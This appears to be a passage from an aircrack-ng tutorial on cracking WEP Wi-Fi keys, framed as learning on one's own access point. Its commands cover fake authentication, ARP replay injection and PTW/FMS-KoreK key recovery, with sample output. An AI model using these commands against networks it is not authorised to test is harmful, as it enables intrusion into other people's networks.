WEB-NES-BAY

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

To associate with an access point, use fake authentication:

aireplay-ng -1 0 -e Ronny -a 00:1e:c9:4a:ca:5d -h 00:1e:c9:44:cd:6a eth1

Success looks like:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful  

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e Ronny -a 00:1e:c9:4a:ca:5d -h 00:1e:c9:44:cd:6a eth1

Success looks like:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful 
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.

Here is an example of what a failed authentication looks like:

8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful 
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request

Notice the “Got a deauthentication packet” and the continuous retries above. Do not proceed to the next step until you have the fake authentication running correctly.

The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. For an explanation of ARP, see this PC Magazine page or Wikipedia. The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV. Again, this is our objective, to obtain a large number of IVs in a short period of time.

Open another console session and enter:

aireplay-ng -3 -b 00:1e:c9:4a:ca:5d -h 00:1e:c9:44:cd:6a eth1

It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. On your home network, here is an easy way to generate an ARP request: On a wired PC, ping a non-existent IP on your home LAN.

Here is what the screen looks like when ARP requests are being injected:

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

You can confirm that you are injecting by checking your airodump-ng screen.

The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps. Note: For learning purposes, you should use a 64 bit WEP key on your AP to speed up the cracking process. If this is the case, then you can include ”-n 64” to limit the checking of keys to 64 bits.

Two methods will be shown. It is recommended you try both for learning purposes. By trying both methods, you will see quickly the PTW method successfully determines the WEP key compared to the FMS/Korek method. As a reminder, the PTW method only works successfully with arp request/reply packets. Since this tutorial covers injection arp request packets, you can properly use this method. The other requirement is that you capture the full packet with airodump-ng. Meaning, do not use the ”--ivs” option.

Start another console session and enter:

aircrack-ng -z -b 00:1e:c9:4a:ca:5d output*.cap

To also use the FMS/KoreK method, start another console session and enter:

aircrack-ng -b 00:1e:c9:4a:ca:5d output*.cap

If you are using 1.0-rc1, add the option ”-K” for the FMS/KoreK attack. (1.0-rc1 defaults to PTW.)

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.

Here is what success looks like:

Aircrack-ng 0.9

[00:03:06] Tested 674449 keys (got 96610 IVs)
KB    depth   byte(vote)
0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%

Notice that in this case it took far less then the estimated 250,000 IVs to crack the key. (For this example, the FMS/KoreK attack was used.)